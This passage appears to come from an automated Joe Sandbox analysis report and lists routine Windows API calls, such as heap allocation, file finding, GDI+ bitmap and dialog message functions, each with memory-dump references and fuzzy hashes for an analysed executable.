                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: BitmapCreateFromGdipStream
                                                            • String ID:
                                                            • API String ID: 1918208029-0
                                                            • Opcode ID: ee9376bf30b49aa72c99e32b6d4a86a26493b8070c9fb86bf33059e5d90acf44
                                                            • Instruction ID: c36560054e15a16e34b19858cb8b91ba53688bacf73486681ff9acade31a73a5
                                                            • Opcode Fuzzy Hash: ee9376bf30b49aa72c99e32b6d4a86a26493b8070c9fb86bf33059e5d90acf44
                                                            • Instruction Fuzzy Hash: 26E0ED71904618EBDB50EF94C9457DEBBF8EF04352F20806AE955A3601D3B8AF089B51
                                                            APIs
                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00063B8A
                                                            • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00063B95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                            • String ID:
                                                            • API String ID: 1660781231-0
                                                            • Opcode ID: 2a915c2c83fd249c1dabda9805c8640d5807bc097a449518adb780a9e13513f9
                                                            • Instruction ID: f3479b7392960c7cf447b6618eb1d9d037700ea8a1962c9add1d808d41eba7aa
                                                            • Opcode Fuzzy Hash: 2a915c2c83fd249c1dabda9805c8640d5807bc097a449518adb780a9e13513f9
                                                            • Instruction Fuzzy Hash: C1D0A97980870004DCA026B02902589238B6B227B1BA0224AE3208A2C3EB2482482192
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemShowWindow
                                                            • String ID:
                                                            • API String ID: 3351165006-0
                                                            • Opcode ID: 27cb43cc082284d0e435d64474fabc71d7f966277b2cc40de97111e88a6d96bc
                                                            • Instruction ID: 5fed088f87f61b588d920ac40395247cddbea14c3d87fead628b33373878eee0
                                                            • Opcode Fuzzy Hash: 27cb43cc082284d0e435d64474fabc71d7f966277b2cc40de97111e88a6d96bc
                                                            • Instruction Fuzzy Hash: 9AC01232058A00BEDB010BB0DC09E3FBBA8BBA6212F08C908B0A5C0060C23CC010DB11
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00049087
                                                              • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
                                                              • Part of subcall function 00042032: __EH_prolog.LIBCMT ref: 00042037
                                                              • Part of subcall function 0004B946: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$CloseFind
                                                            • String ID:
                                                            • API String ID: 2506663941-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000413FD
                                                              • Part of subcall function 00046871: __EH_prolog.LIBCMT ref: 00046876
                                                              • Part of subcall function 0004E278: __EH_prolog.LIBCMT ref: 0004E27D
                                                              • Part of subcall function 0004642D: __EH_prolog.LIBCMT ref: 00046432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000413FD
                                                              • Part of subcall function 00046871: __EH_prolog.LIBCMT ref: 00046876
                                                              • Part of subcall function 0004E278: __EH_prolog.LIBCMT ref: 0004E27D
                                                              • Part of subcall function 0004642D: __EH_prolog.LIBCMT ref: 00046432
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005C138
                                                              • Part of subcall function 000413F8: __EH_prolog.LIBCMT ref: 000413FD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 0006BD08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressProc
                                                            • String ID:
                                                            • API String ID: 190572456-0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog
                                                            • String ID:
                                                            • API String ID: 3519838083-0
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 0005EA27
                                                              • Part of subcall function 0005195C: _wcslen.LIBCMT ref: 00051972
                                                              • Part of subcall function 00048803: __EH_prolog.LIBCMT ref: 00048808
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$_wcslen
                                                            • String ID:
                                                            • API String ID: 2838827086-0
                                                            APIs
                                                              • Part of subcall function 0006C146: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0006A393,00000001,00000364,?,0006524D,?,?,000830C4), ref: 0006C187
                                                            • _free.LIBCMT ref: 0006D4F5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0006A393,00000001,00000364,?,0006524D,?,?,000830C4), ref: 0006C187
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,0004A81B,?,?,?,?,?,0007365F,000000FF), ref: 0004A87B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindNotification
                                                            • String ID:
                                                            • API String ID: 2591292051-0
                                                            APIs
                                                              • Part of subcall function 0004BA74: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BA9D
                                                              • Part of subcall function 0004BA74: FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BACB
                                                              • Part of subcall function 0004BA74: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0004B96B,000000FF,?,?), ref: 0004BAD7
                                                            • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Find$FileFirst$CloseErrorLast
                                                            • String ID:
                                                            • API String ID: 1464966427-0
                                                            APIs
                                                            • SetThreadExecutionState.KERNEL32(00000001), ref: 00052136
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ExecutionStateThread
                                                            • String ID:
                                                            • API String ID: 2211380416-0
                                                            APIs
                                                            • GdipAlloc.GDIPLUS(00000010), ref: 0005B60C
                                                              • Part of subcall function 0005B398: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0005B3B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Gdip$AllocBitmapCreateFromStream
                                                            • String ID:
                                                            • API String ID: 1915507550-0
                                                            APIs
                                                            • DloadProtectSection.DELAYIMP ref: 0005F5BD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: DloadProtectSection
                                                            • String ID:
                                                            • API String ID: 2203082970-0
                                                            APIs
                                                            • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00052E58), ref: 0005ED62
                                                              • Part of subcall function 0005C5F8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005C609
                                                              • Part of subcall function 0005C5F8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005C61A
                                                              • Part of subcall function 0005C5F8: IsDialogMessageW.USER32(0001046C,?), ref: 0005C62E
                                                              • Part of subcall function 0005C5F8: TranslateMessage.USER32(?), ref: 0005C63C
                                                              • Part of subcall function 0005C5F8: DispatchMessageW.USER32(?), ref: 0005C646
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                            • String ID:
                                                            • API String ID: 897784432-0
                                                            APIs
                                                            • GetFileType.KERNELBASE(000000FF,0004A9FE), ref: 0004AB08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FileType
                                                            • String ID:
                                                            • API String ID: 3081899298-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
                                                              • Part of subcall function 0005F837: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0005F8BB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 0005F1BD
                                                              • Part of subcall function 0005F837: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0005F8AA
